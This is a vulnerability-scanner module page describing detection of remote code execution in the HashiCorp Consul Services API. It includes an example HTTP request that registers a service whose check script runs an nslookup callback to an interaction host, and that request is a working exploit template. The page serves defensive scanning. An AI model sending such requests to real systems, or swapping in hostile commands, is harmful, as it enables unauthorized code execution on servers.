Vidoc logo

Module library

All modulesVisit vidocsecurity.com
Ethical Hacking Automation

Automate Recon and scanning process with Vidoc. All security teams in one place

Start for free

Hashicorp Consul Services API - Remote Code Execution

By kannthu

Critical
Vidoc logoVidoc Module
#hashicorp#rce#oast#intrusive#edb
Description

What is "Hashicorp Consul Services API - Remote Code Execution?"

The "Hashicorp Consul Services API - Remote Code Execution" module is designed to detect a vulnerability in the Hashicorp Consul Services API that allows for remote code execution on Consul nodes. Consul is a service mesh solution that provides service discovery, configuration, and segmentation capabilities for distributed applications. This vulnerability can be exploited to execute arbitrary commands on the affected nodes, potentially leading to unauthorized access, data breaches, and system compromise.

This module is classified as critical, indicating the severity of the vulnerability and the potential impact it can have on the affected systems.

Author: pikpikcu

Impact

The exploitation of this vulnerability can have severe consequences for the affected systems. By executing arbitrary commands on Consul nodes, an attacker can gain unauthorized access, manipulate data, and compromise the integrity and availability of the system. This can lead to further exploitation, data breaches, and potential damage to the organization's reputation.

How the module works?

The module works by sending a specific HTTP request to the target Consul Services API. The request is designed to register a new service with a malicious payload that triggers the remote code execution vulnerability. The payload includes a script that performs a DNS lookup on a specified interaction URL.

Example HTTP request:

PUT /v1/agent/service/register HTTP/1.1
Host: <Hostname>

{
  "ID": "<randTextAlphanumeric(10)>",
  "Name": "<randTextAlphanumeric(10)>",
  "Address": "127.0.0.1",
  "Port": 80,
  "check": {
    "script": "nslookup <InteractionURL>",
    "interval": "10s",
    "Timeout": "86400s"
  }
}

The module includes matching conditions that check for the presence of a specific word in the "interactsh_protocol" part of the response. If the condition is met, indicating a DNS interaction, the module reports the vulnerability.

Note: The actual JSON definitions and matching conditions are not shown here for brevity.

For more information, refer to the reference.

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
word: dns
Passive global matcher
No matching conditions.
On match action
Report vulnerability